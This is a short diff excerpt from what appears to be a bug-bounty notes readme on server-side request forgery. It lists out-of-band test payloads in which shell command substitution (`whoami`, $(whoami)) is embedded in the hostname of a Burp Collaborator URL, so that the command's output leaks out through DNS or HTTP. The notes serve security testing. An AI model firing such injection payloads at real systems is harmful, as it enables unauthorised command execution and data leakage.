djmahe4/bug-bounty/SSRF/readme.md

    ```
    http://<your-collaborator>.burpcollaborator.net
    ```
-   eg: if you have a website like:`http://example.burpcollaporator.net` ⇒ you can make RCE like :<br>
+   eg: if you have a website like:`http://example.burpcollaporator.net` ⇒ you can make RCE like :

 ```http://`whoami`.example.burpcollaporator.net``` OR `http://$(whoami).example.burpcollaporator.net`<br>
    If you see an HTTP/DNS hit, SSRF is confirmed.